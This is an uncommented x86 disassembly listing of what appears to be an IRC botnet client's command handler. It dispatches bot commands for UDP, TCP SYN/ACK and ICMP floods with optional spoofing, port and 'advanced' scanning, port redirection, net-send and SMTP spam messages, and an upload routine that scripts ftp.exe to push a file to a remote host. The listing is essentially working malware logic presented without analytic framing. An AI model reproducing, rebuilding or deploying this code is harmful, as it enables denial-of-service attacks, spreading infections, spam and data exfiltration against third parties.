mov ecx, [ebp+var_34A4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_4068F3
loc_4068DD: ; CODE XREF: sub_401ACD+4E24�j
cmp [ebp+var_3498], ebx
jnz loc_407279
push 32h
call dword_427078 ; Sleep
jmp short loc_4068DD
; ---------------------------------------------------------------------------
loc_4068F3: ; CODE XREF: sub_401ACD+4E0E�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42B218
jmp loc_40726A
; ---------------------------------------------------------------------------
loc_406904: ; CODE XREF: sub_401ACD+4D49�j
push [ebp+arg_8]
push offset aPhatwonk ; "phatwonk"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407D91
push [ebp+arg_8]
push offset aWonk ; "wonk"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407D91
push [ebp+arg_8]
push offset aJpldg10 ; "jpldg10"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407C53
push [ebp+arg_8]
push offset aJpl10 ; "jpl10"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407C53
push [ebp+arg_8]
push offset aRedirect ; "redirect"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407B56
push [ebp+arg_8]
push offset aRd ; "rd"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407B56
push [ebp+arg_8]
push offset aScan ; "scan"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407A63
push [ebp+arg_8]
push offset aSc ; "sc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407A63
push [ebp+arg_8]
push offset aC_privmsg ; "c_privmsg"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40795E
push [ebp+arg_8]
push offset aC_pm ; "c_pm"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40795E
push [ebp+arg_8]
push offset aC_action ; "c_action"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407866
push [ebp+arg_8]
push offset aC_a ; "c_a"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407866
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_401E94
push [ebp+arg_8]
push offset aPortscan ; "portscan"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407760
push [ebp+arg_8]
push offset aPsc ; "psc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407760
push [ebp+arg_8]
push offset aAdvscan ; "advscan"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407299
push [ebp+arg_8]
push offset aAdv ; "adv"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407299
push [ebp+arg_8]
push offset aUdpflood ; "udpflood"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407150
push [ebp+arg_8]
push offset aUdp ; "udp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407150
push [ebp+arg_8]
push offset aU ; "u"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407150
push [ebp+arg_8]
push offset aNetsend ; "netsend"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407042
push [ebp+arg_8]
push offset aNs ; "ns"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_407042
push [ebp+arg_8]
push offset aPingflood ; "pingflood"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_406F18
push [ebp+arg_8]
push offset aPing_0 ; "ping"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_406F18
push [ebp+arg_8]
push offset aP ; "p"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_406F18
push [ebp+arg_8]
push offset aTcpflood ; "tcpflood"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_406D6F
push [ebp+arg_8]
push offset aTcp ; "tcp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_406D6F
push [ebp+arg_8]
push offset aEmail ; "email"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_406D17
push [ebp+arg_10]
lea eax, [ebp+var_47EC]
push eax
call sub_41BEB0
push edi
call sub_41B779
push [ebp+arg_0]
mov [ebp+arg_10], eax
lea eax, [ebp+var_4188]
push eax
call sub_41BEB0
push [ebp+arg_18]
lea eax, [ebp+var_4588]
push eax
call sub_41BEB0
push offset asc_42D128 ; " "
push offset dword_42BBFC
push [ebp+esi+var_7C]
call sub_417EEF
push eax
lea eax, [ebp+var_4288]
push eax
call sub_41BEB0
add esp, 30h
lea eax, [ebp+var_5588]
push eax
push 101h
call ds:dword_4CB5C4 ; WSAStartup
lea eax, [ebp+var_47EC]
push eax
call ds:dword_4CB6D8 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call ds:dword_4CB6D4 ; socket
push [ebp+arg_10]
mov esi, eax
mov [ebp+var_31C], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_318], eax
call ds:dword_4CB654 ; htons
mov [ebp+var_31A], ax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_4288]
push eax
lea eax, [ebp+var_4588]
push eax
lea eax, [ebp+var_4188]
push eax
lea eax, [ebp+var_5988]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_41B886
add esp, 1Ch
lea eax, [ebp+var_31C]
push 10h
push eax
push esi
call ds:dword_4CB5FC ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call ds:dword_4CB66C ; recv
lea eax, [ebp+var_4088]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_5988]
push eax
push esi
call ds:dword_4CB6A4 ; send
push ebx
lea eax, [ebp+var_4088]
push edi
push eax
push esi
call ds:dword_4CB66C ; recv
push esi
call ds:dword_4CB6EC ; closesocket
call ds:dword_4CB5AC ; WSACleanup
lea eax, [ebp+var_4588]
push eax
push offset unk_42B0D8
loc_406CD0: ; CODE XREF: sub_401ACD+2E83�j
; sub_401ACD+4667�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
loc_406CDC: ; CODE XREF: sub_401ACD+248C�j
add esp, 0Ch
loc_406CDF: ; CODE XREF: sub_401ACD+4585�j
; sub_401ACD+6654�j ...
cmp [ebp+var_8], ebx
jnz short loc_406D00
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_406D00: ; CODE XREF: sub_401ACD+29B3�j
; sub_401ACD+2A06�j ...
mov esi, [ebp+arg_24]
loc_406D03: ; CODE XREF: sub_401ACD+68F3�j
; sub_401ACD+78E3�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
pop ecx
mov eax, esi
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_406D17: ; CODE XREF: sub_401ACD+50AD�j
push [ebp+arg_8]
push offset aHttpcon ; "httpcon"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_406D41
push [ebp+arg_8]
push offset aHcon ; "hcon"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4072E9
loc_406D41: ; CODE XREF: sub_401ACD+525B�j
push [ebp+esi+var_7C]
push [ebp+arg_18]
push [ebp+arg_0]
push edi
call sub_41B779
pop ecx
push eax
push [ebp+arg_10]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4100DC
jmp loc_4040AB
; ---------------------------------------------------------------------------
loc_406D6F: ; CODE XREF: sub_401ACD+507F�j
; sub_401ACD+5096�j
push [ebp+arg_10]
mov esi, 80h
lea eax, [ebp+var_1354]
push esi
push eax
call sub_41B980
lea eax, [ebp+var_1354]
push eax
push offset aSyn ; "syn"
call sub_41C070
add esp, 14h
test eax, eax
jz short loc_406DD4
lea eax, [ebp+var_1354]
push eax
push offset aAck ; "ack"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_406DD4
lea eax, [ebp+var_1354]
push eax
push offset aRandom_0 ; "random"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_406DD4
push offset unk_42B090
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_406DD4: ; CODE XREF: sub_401ACD+52CD�j
; sub_401ACD+52E4�j ...
push [ebp+arg_18]
call sub_41B779
cmp eax, ebx
pop ecx
mov [ebp+var_124C], eax
jle loc_406F00
push [ebp+arg_10]
lea eax, [ebp+var_1354]
push esi
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_13D4]
push edi
push esi
push eax
call sub_41B980
push [ebp+arg_0]
call sub_41B779
mov [ebp+var_1250], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_88]
setnz al
mov [ebp+var_1248], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13D8], eax
lea eax, [ebp+var_12D4]
push esi
push eax
call sub_41B980
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_1248], ebx
mov [ebp+var_1244], eax
mov eax, [ebp+var_8]
mov [ebp+var_1240], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_406E71
mov eax, offset aNormal ; "Normal"
loc_406E71: ; CODE XREF: sub_401ACD+539D�j
push [ebp+arg_18]
push [ebp+arg_0]
push edi
push [ebp+arg_10]
push eax
push offset unk_42B04C
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41B980
push ebx
lea eax, [ebp+var_2C4]
push 14h
push eax
call sub_40B0F7
add esp, 2Ch
mov [ebp+var_1254], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_13D8]
push ebx
push eax
push offset sub_413E36
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1254]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_406EEF
loc_406ED9: ; CODE XREF: sub_401ACD+5420�j
cmp [ebp+var_123C], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_406ED9
; ---------------------------------------------------------------------------
loc_406EEF: ; CODE XREF: sub_401ACD+540A�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42B014
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_406F00: ; CODE XREF: sub_401ACD+5318�j
push offset unk_42AFDC
loc_406F05: ; CODE XREF: sub_401ACD+2019�j
; sub_401ACD+202F�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
pop ecx
pop ecx
jmp loc_40828C
; ---------------------------------------------------------------------------
loc_406F18: ; CODE XREF: sub_401ACD+503A�j
; sub_401ACD+5051�j ...
cmp ds:dword_4CB744, ebx
jnz loc_407027
mov eax, [ebp+var_8]
push 7Fh
push [ebp+arg_10]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_4]
mov [ebp+var_FF8], eax
lea eax, [ebp+var_108C]
push eax
call sub_41B5F0
push edi
call sub_41B779
push [ebp+arg_0]
mov [ebp+var_100C], eax
call sub_41B779
push [ebp+arg_18]
mov [ebp+var_1008], eax
call sub_41B779
push 7Fh
mov [ebp+var_1004], eax
push [ebp+var_88]
lea eax, [ebp+var_110C]
push eax
call sub_41B5F0
mov eax, [ebp+arg_4]
add esp, 24h
mov [ebp+var_1110], eax
lea eax, [ebp+var_108C]
push [ebp+var_1004]
push [ebp+var_1008]
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_100C]
push offset unk_42AF94
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 16h
push eax
call sub_40B0F7
add esp, 24h
mov [ebp+var_FFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1110]
push ebx
push eax
push offset sub_413285
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_FFC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407016
loc_407000: ; CODE XREF: sub_401ACD+5547�j
cmp [ebp+var_FF0], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_407000
; ---------------------------------------------------------------------------
loc_407016: ; CODE XREF: sub_401ACD+5531�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42AF5C
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_407027: ; CODE XREF: sub_401ACD+5451�j
push 1FFh
lea eax, [ebp+var_2C4]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_41B5F0
jmp loc_408289
; ---------------------------------------------------------------------------
loc_407042: ; CODE XREF: sub_401ACD+500C�j
; sub_401ACD+5023�j
push edi
lea eax, [ebp+var_2C4]
push [ebp+arg_10]
push [ebp+arg_0]
push offset unk_42AF08
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
push [ebp+arg_0]
call sub_41AFE0
mov edx, eax
push edi
mov edi, edx
call sub_41AFE0
push [ebp+arg_10]
add edi, eax
call sub_41AFE0
push [ebp+arg_8]
add edi, eax
call sub_41AFE0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+edi+7]
push eax
call sub_41B900
add esp, 40h
mov [ebp+arg_C], eax
push [ebp+arg_0]
call sub_41B779
mov edi, [ebp+arg_1C]
cmp eax, ebx
pop ecx
mov [ebp+arg_14], eax
mov [ebp+arg_20], ebx
jle short loc_40713C
loc_4070C5: ; CODE XREF: sub_401ACD+561C�j
push [ebp+arg_C]
push edi
push [ebp+arg_10]
call sub_4185A5
add esp, 0Ch
cmp eax, 1
mov [ebp+arg_1C], eax
jz short loc_4070ED
cmp eax, ebx
jnz short loc_40710C
inc [ebp+arg_20]
mov eax, [ebp+arg_20]
cmp eax, [ebp+arg_14]
jl short loc_4070C5
jmp short loc_407145
; ---------------------------------------------------------------------------
loc_4070ED: ; CODE XREF: sub_401ACD+560D�j
push ebx
push [ebp+var_4]
push offset unk_42AED0
loc_4070F6: ; CODE XREF: sub_401ACD+5681�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
jmp loc_4072E9
; ---------------------------------------------------------------------------
loc_40710C: ; CODE XREF: sub_401ACD+5611�j
push [ebp+arg_1C]
lea eax, [ebp+var_2C4]
push offset unk_42AE9C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 20h
loc_40713C: ; CODE XREF: sub_401ACD+55F6�j
cmp [ebp+arg_1C], ebx
jnz loc_4072E9
loc_407145: ; CODE XREF: sub_401ACD+561E�j
push ebx
push [ebp+var_4]
push offset unk_42AE68
jmp short loc_4070F6
; ---------------------------------------------------------------------------
loc_407150: ; CODE XREF: sub_401ACD+4FC7�j
; sub_401ACD+4FDE�j ...
mov eax, [ebp+var_8]
push 7Fh
push [ebp+arg_10]
mov [ebp+var_C64], eax
mov eax, [ebp+var_4]
mov [ebp+var_C68], eax
lea eax, [ebp+var_CFC]
push eax
call sub_41B5F0
push edi
call sub_41B779
push [ebp+arg_0]
mov [ebp+var_C7C], eax
call sub_41B779
push [ebp+arg_18]
mov [ebp+var_C78], eax
call sub_41B779
mov esi, [ebp+esi+var_7C]
add esp, 18h
cmp esi, ebx
mov [ebp+var_C74], eax
jz short loc_4071B5
push esi
call sub_41B779
pop ecx
mov [ebp+var_C70], eax
jmp short loc_4071BB
; ---------------------------------------------------------------------------
loc_4071B5: ; CODE XREF: sub_401ACD+56D7�j
mov [ebp+var_C70], ebx
loc_4071BB: ; CODE XREF: sub_401ACD+56E6�j
push 7Fh
lea eax, [ebp+var_D7C]
push [ebp+var_88]
push eax
call sub_41B5F0
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_CFC]
mov [ebp+var_D80], esi
push [ebp+var_C74]
push [ebp+var_C78]
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_C7C]
push offset unk_42AE20
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 17h
push eax
call sub_40B0F7
add esp, 24h
mov [ebp+var_C6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_D80]
push ebx
push eax
push offset sub_413411
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_C6C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40725E
loc_40724C: ; CODE XREF: sub_401ACD+578F�j
cmp [ebp+var_C60], ebx
jnz short loc_407279
push 32h
call dword_427078 ; Sleep
jmp short loc_40724C
; ---------------------------------------------------------------------------
loc_40725E: ; CODE XREF: sub_401ACD+577D�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42ADE8
loc_40726A: ; CODE XREF: sub_401ACD+4E32�j
; sub_401ACD+62BF�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
loc_407279: ; CODE XREF: sub_401ACD+4E16�j
; sub_401ACD+5785�j ...
cmp [ebp+var_8], ebx
jnz loc_4083BD
push ebx
push [ebp+var_4]
loc_407286: ; CODE XREF: sub_401ACD+22DF�j
lea eax, [ebp+var_2C4]
push eax
push [ebp+var_88]
push esi
jmp loc_4082A9
; ---------------------------------------------------------------------------
loc_407299: ; CODE XREF: sub_401ACD+4F99�j
; sub_401ACD+4FB0�j
push 0Bh
call sub_40B33F
push edi
mov [ebp+arg_1C], eax
call sub_41B779
add eax, [ebp+arg_1C]
pop ecx
pop ecx
cmp eax, 1F4h
jle loc_407455
push [ebp+arg_1C]
lea eax, [ebp+var_2C4]
push offset unk_42ADA8
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 20h
loc_4072E9: ; CODE XREF: sub_401ACD+526E�j
; sub_401ACD+563A�j ...
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz loc_401E94
push [ebp+arg_8]
push offset aUpload ; "upload"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_409855
push 4
push esi
call sub_416909
pop ecx
test eax, eax
pop ecx
jnz short loc_407325
push esi
push offset unk_42AD80
jmp loc_408CDC
; ---------------------------------------------------------------------------
loc_407325: ; CODE XREF: sub_401ACD+584B�j
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_41B8E2
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_41B8E2
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_51F8]
push edx
push eax
lea eax, [ebp+var_2E58]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_41B886
lea eax, [ebp+var_2E58]
push offset aAb ; "ab"
push eax
call sub_41B4C2
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_401E94
push esi
push [ebp+arg_18]
push [ebp+arg_0]
push edi
push [ebp+arg_10]
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41BE06
push [ebp+arg_24]
call sub_41B05B
add esp, 20h
lea eax, [ebp+var_2E58]
push eax
lea eax, [ebp+var_4CF0]
push offset aSS_3 ; "-s:%s"
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_4CF0]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call ds:dword_4CB5C0
push [ebp+arg_10]
test eax, eax
push esi
jz short loc_4073F4
push offset unk_42AD10
jmp short loc_4073F9
; ---------------------------------------------------------------------------
loc_4073F4: ; CODE XREF: sub_401ACD+591E�j
push offset unk_42ACE0
loc_4073F9: ; CODE XREF: sub_401ACD+5925�j
call sub_41B886
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_407422
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_407422: ; CODE XREF: sub_401ACD+5937�j
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
loc_40742E: ; CODE XREF: sub_401ACD+5986�j
lea eax, [ebp+var_2E58]
push 4
push eax
call sub_416909
add esp, 0Ch
test eax, eax
jz loc_401E94
lea eax, [ebp+var_2E58]
push eax
call sub_41BDDC
jmp short loc_40742E
; ---------------------------------------------------------------------------
loc_407455: ; CODE XREF: sub_401ACD+57E6�j
push [ebp+arg_10]
call sub_41B779
push edi
mov [ebp+var_370], eax
call sub_41B779
push [ebp+arg_0]
mov [ebp+var_358], eax
call sub_41B779
add esp, 0Ch
cmp eax, 5
mov [ebp+var_36C], eax
jnb short loc_40748E
push 5
pop eax
mov [ebp+var_36C], eax
loc_40748E: ; CODE XREF: sub_401ACD+59B6�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40749B
mov [ebp+var_36C], ecx
loc_40749B: ; CODE XREF: sub_401ACD+59C6�j
push [ebp+arg_18]
call sub_41B779
mov [ebp+var_368], eax
mov eax, 320h
cmp [ebp+var_368], eax
pop ecx
jbe short loc_4074BD
mov [ebp+var_368], eax
loc_4074BD: ; CODE XREF: sub_401ACD+59E8�j
or [ebp+var_354], 0FFFFFFFFh
cmp dword_431B00, ebx
mov [ebp+arg_20], ebx
jz short loc_40750C
mov edi, offset dword_431B00
loc_4074D4: ; CODE XREF: sub_401ACD+5A21�j
push [ebp+arg_10]
lea eax, [edi-28h]
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_4074F2
inc [ebp+arg_20]
add edi, 40h
cmp [edi], ebx
jnz short loc_4074D4
jmp short loc_40750C
; ---------------------------------------------------------------------------
loc_4074F2: ; CODE XREF: sub_401ACD+5A17�j
mov eax, [ebp+arg_20]
mov ecx, eax
mov [ebp+var_354], eax
shl ecx, 6
mov ecx, dword_431B00[ecx]
mov [ebp+var_370], ecx
loc_40750C: ; CODE XREF: sub_401ACD+5A00�j
; sub_401ACD+5A23�j
cmp [ebp+var_370], ebx
jnz short loc_40751E
push offset unk_42ACAC
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_40751E: ; CODE XREF: sub_401ACD+5A45�j
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
mov [ebp+arg_0], edi
jz short loc_407559
cmp byte ptr [edi], 23h
jz short loc_407559
push edi
lea eax, [ebp+var_484]
push 10h
push eax
call sub_41B980
push 78h
push edi
call sub_41BFB0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_344], eax
jmp loc_407633
; ---------------------------------------------------------------------------
loc_407559: ; CODE XREF: sub_401ACD+5A5A�j
; sub_401ACD+5A5F�j
cmp [ebp+var_8FF], bl
jnz short loc_40757B
cmp [ebp+var_8FE], bl
jnz short loc_40757B
cmp [ebp+var_8EE], bl
jnz short loc_40757B
push offset unk_42AC78
jmp loc_406F05
; ---------------------------------------------------------------------------
loc_40757B: ; CODE XREF: sub_401ACD+5A92�j
; sub_401ACD+5A9A�j ...
push 10h
lea eax, [ebp+var_2D0]
pop edi
push eax
lea eax, [ebp+var_2F8]
push eax
mov [ebp+var_2D0], edi
push [ebp+arg_4]
call ds:dword_4CB5F8 ; getsockname
mov al, [ebp+var_8FF]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2F4], eax
push [ebp+var_2F4]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_484]
push eax
call sub_41B5F0
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_40762D
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_484]
push eax
call sub_41BE40
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_407621
loc_4075FF: ; CODE XREF: sub_401ACD+5B52�j
cmp eax, ebx
jz short loc_407621
mov byte ptr [eax], 78h
lea eax, [ebp+var_484]
push 30h
push eax
call sub_41BE40
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_4075FF
loc_407621: ; CODE XREF: sub_401ACD+5B30�j
; sub_401ACD+5B34�j
mov [ebp+var_344], 1
jmp short loc_407633
; ---------------------------------------------------------------------------
loc_40762D: ; CODE XREF: sub_401ACD+5B0A�j
mov [ebp+var_344], ebx
loc_407633: ; CODE XREF: sub_401ACD+5A87�j
; sub_401ACD+5B5E�j
mov eax, [ebp+arg_4]
push [ebp+var_88]
mov [ebp+var_374], eax
mov eax, [ebp+var_4]
mov [ebp+var_34C], eax
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov edi, 80h
lea eax, [ebp+var_474]
push edi
push eax
call sub_41B980
mov esi, [ebp+esi+var_78]
add esp, 0Ch
cmp esi, ebx
jz short loc_407684
loc_407671: ; CODE XREF: sub_401ACD+5BDA�j
push esi
loc_407672: ; CODE XREF: sub_401ACD+5BC4�j
lea eax, [ebp+var_3F4]
push edi
push eax
call sub_41B980
add esp, 0Ch
jmp short loc_4076AF
; ---------------------------------------------------------------------------
loc_407684: ; CODE XREF: sub_401ACD+5BA2�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_407693
cmp byte ptr [eax], 23h
jnz short loc_407693
push eax
jmp short loc_407672
; ---------------------------------------------------------------------------
loc_407693: ; CODE XREF: sub_401ACD+5BBC�j
; sub_401ACD+5BC1�j
mov esi, offset aF ; "#f"
push offset byte_43D808
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_407671
mov [ebp+var_3F4], bl
loc_4076AF: ; CODE XREF: sub_401ACD+5BB5�j
cmp [ebp+var_344], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4076C1
mov eax, offset aSequential ; "Sequential"
loc_4076C1: ; CODE XREF: sub_401ACD+5BED�j
push [ebp+var_358]
lea ecx, [ebp+var_484]
push [ebp+var_368]
push [ebp+var_36C]
push [ebp+var_370]
push ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42AC10
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B0F7
add esp, 2Ch
mov [ebp+var_364], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_484]
push ebx
push eax
push offset sub_40C33D
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_364]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40774F
loc_407739: ; CODE XREF: sub_401ACD+5C80�j
cmp [ebp+var_340], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_407739
; ---------------------------------------------------------------------------
loc_40774F: ; CODE XREF: sub_401ACD+5C6A�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42ABD8
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_407760: ; CODE XREF: sub_401ACD+4F6B�j
; sub_401ACD+4F82�j
push [ebp+arg_10]
call sub_40AAFA
push edi
mov [ebp+var_4E0], eax
call sub_41B779
push [ebp+arg_0]
mov [ebp+var_4F0], eax
call sub_41B779
push [ebp+arg_18]
mov [ebp+var_4EC], eax
call sub_41B779
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_4E8], eax
lea eax, [ebp+var_570]
mov [ebp+var_574], esi
push eax
call sub_41B5F0
add esp, 1Ch
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_4D8], edi
push [ebp+var_4EC]
mov [ebp+var_4D4], eax
push [ebp+var_4F0]
push [ebp+var_4E8]
push [ebp+var_4E0]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_2C4]
push offset unk_42AB88
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B0F7
add esp, 24h
mov [ebp+var_4E4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_574]
push ebx
push eax
push offset sub_40C75A
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_4E4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_407855
loc_40783F: ; CODE XREF: sub_401ACD+5D86�j
cmp [ebp+var_4D0], ebx
jnz loc_403DA1
push 32h
call dword_427078 ; Sleep
jmp short loc_40783F
; ---------------------------------------------------------------------------
loc_407855: ; CODE XREF: sub_401ACD+5D70�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42AB4C
jmp loc_403D92
; ---------------------------------------------------------------------------
loc_407866: ; CODE XREF: sub_401ACD+4F2E�j
; sub_401ACD+4F45�j
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
cmp byte_43E5A8[eax], bl
jz loc_409855
cmp [ebp+var_C], ebx
jz loc_409855
push edi
call sub_41AFE0
push [ebp+arg_10]
mov esi, eax
call sub_41AFE0
push [ebp+arg_8]
add esi, eax
call sub_41AFE0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41B900
add esp, 14h
mov esi, eax
lea eax, [ebp+var_2C4]
push esi
push offset dword_42AB40
push eax
call sub_41B886
add esp, 0Ch
cmp esi, ebx
jz loc_409855
push [ebp+arg_10]
call sub_41B779
test eax, eax
pop ecx
jle loc_409855
push [ebp+arg_10]
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_409855
push ebx
lea eax, [ebp+var_2C4]
push ebx
push eax
push edi
